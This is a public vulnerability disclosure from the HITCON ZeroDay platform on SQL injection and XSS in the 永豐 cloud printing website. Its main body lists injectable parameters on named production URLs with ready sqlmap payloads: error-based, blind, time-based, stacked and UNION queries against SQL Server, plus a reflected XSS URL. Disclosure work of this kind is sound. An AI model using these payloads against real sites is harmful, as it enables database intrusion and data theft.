Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00206
- Vendor: 永豐紙業股份有限公司
- Title: 永豐雲端印刷網 SQL injection and XSS
- Introduction: SQL injection and XSS
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2016/09/15 03:27:21 : 新提交 (由 WhiteCat 更新此狀態)
- 2016/09/26 09:13:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/09/27 23:27:38 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/11/15 03:00:02 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/11/17 01:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2016-00206
- 通報者:andyw330 (WhiteCat)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
http://www.cloudw2p.com/site/product4.php?type=alert("XSS")
SQL injection:
https://www.cloudw2p.com/site/logincheck.php
http://www.cloudw2p.com/site/member_Search_product.php
http://www.cloudw2p.com/site/photo_show_info.php?obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd
http://www.cloudw2p.com/site/photo_show.php?show=all&page=2&&BTYPE=%&iBOOKNAME=
http://www.cloudw2p.com/site/design/mydesign_detail.php?WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf
http://www.cloudw2p.com/site/design/mydesign_author.php?designername=Top
http://www.cloudw2p.com/site/design/index.php?designername=&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
敘述
由於有漏洞的網頁實在太多了
僅列部份頁面與注入點
https://www.cloudw2p.com/site/logincheck.php
Parameter: iid2 (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: iid2=' AND 4365=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4365=4365) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'nsKd'='nsKd&ipass2=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: iid2=' AND 6106=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'LaLo'='LaLo&ipass2=
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)http://www.cloudw2p.com/site/member_Search_product.php
Parameter: BTYPE (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BTYPE=85-2' AND 4395=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4395=4395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'BVxy'='BVxy&OPDAYS1=3&PPID=100&number=3&ppWUNIT=56&num=3&WUNIT=&papertotle=168&UNIT702=15&num702=&totle702=0&ship2=75&ship=75&OPDAYS=3&Response=243
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
http://www.cloudw2p.com/site/photo_show_info.php?obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd
Parameter: obj (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd' AND 6940=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6940=6940) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND 'eVaC'='eVaC
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: obj=95751fec0b73563e8e8bba6c4ce24a3e2b7624bd' AND 4918=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'gWSy'='gWSy
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)http://www.cloudw2p.com/site/photo_show.php?show=all&page=2&&BTYPE=%&iBOOKNAME=
Parameter: show (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all' AND 1054=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1054=1054) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'xeZr'='xeZr&page=2&&BTYPE=%&iBOOKNAME=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Parameter: iBOOKNAME (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%&iBOOKNAME=%' AND 3785=3785 AND '%'='
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%&iBOOKNAME=%' AND 9616=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9616=9616) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))Parameter: BTYPE (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%' AND 7206=7206 AND 'IkHL'='IkHL&iBOOKNAME=
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: show=all&page=2&&BTYPE=%' AND 4249=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4249=4249) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'csQp'='csQp&iBOOKNAME=
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))http://www.cloudw2p.com/site/design/mydesign_detail.php?WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf
Parameter: WBID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' AND 8402=8402 AND 'mrTO'='mrTO
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' AND 6199=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6199=6199) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113))) AND 'JfVg'='JfVg
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf';WAITFOR DELAY '0:0:5'--
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: WBID=c9b7b84de2b78b0955758fe5162562100ea50fcf' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(121)+CHAR(110)+CHAR(71)+CHAR(106)+CHAR(68)+CHAR(81)+CHAR(73)+CHAR(81)+CHAR(101)+CHAR(112)+CHAR(65)+CHAR(84)+CHAR(97)+CHAR(112)+CHAR(104)+CHAR(103)+CHAR(87)+CHAR(100)+CHAR(83)+CHAR(97)+CHAR(70)+CHAR(65)+CHAR(83)+CHAR(112)+CHAR(114)+CHAR(84)+CHAR(78)+CHAR(65)+CHAR(76)+CHAR(120)+CHAR(121)+CHAR(100)+CHAR(111)+CHAR(86)+CHAR(112)+CHAR(111)+CHAR(108)+CHAR(112)+CHAR(81)+CHAR(72)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- inee
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]http://www.cloudw2p.com/site/design/mydesign_author.php?designername=Top
Parameter: designername (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=Top') AND 7728=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7728=7728) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)))-- Xlnc
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: designername=Top') OR 8944=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- pmCF
Vector: OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)http://www.cloudw2p.com/site/design/index.php?designername=&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Parameter: designername (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=') AND 2465=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2465=2465) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))) AND ('jhUA'='jhUA&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: designername=');WAITFOR DELAY '0:0:5'--&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: designername=') UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(100)+CHAR(112)+CHAR(117)+CHAR(65)+CHAR(87)+CHAR(117)+CHAR(98)+CHAR(104)+CHAR(82)+CHAR(97)+CHAR(86)+CHAR(67)+CHAR(67)+CHAR(107)+CHAR(70)+CHAR(122)+CHAR(74)+CHAR(69)+CHAR(115)+CHAR(112)+CHAR(112)+CHAR(65)+CHAR(108)+CHAR(67)+CHAR(120)+CHAR(66)+CHAR(87)+CHAR(84)+CHAR(71)+CHAR(103)+CHAR(72)+CHAR(106)+CHAR(74)+CHAR(97)+CHAR(114)+CHAR(107)+CHAR(115)+CHAR(89)+CHAR(72)+CHAR(72)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dBwy&show=notebook1&info=&page=2&&iBOOKNAME=&O=X
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]Parameter: iBOOKNAME (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: designername=&show=notebook1&info=&page=2&&iBOOKNAME=%' AND 4246=4246 AND '%'='&O=X
Vector: AND [INFERENCE]
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: designername=&show=notebook1&info=&page=2&&iBOOKNAME=%' AND 5996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5996=5996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))) AND '%'='&O=X
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))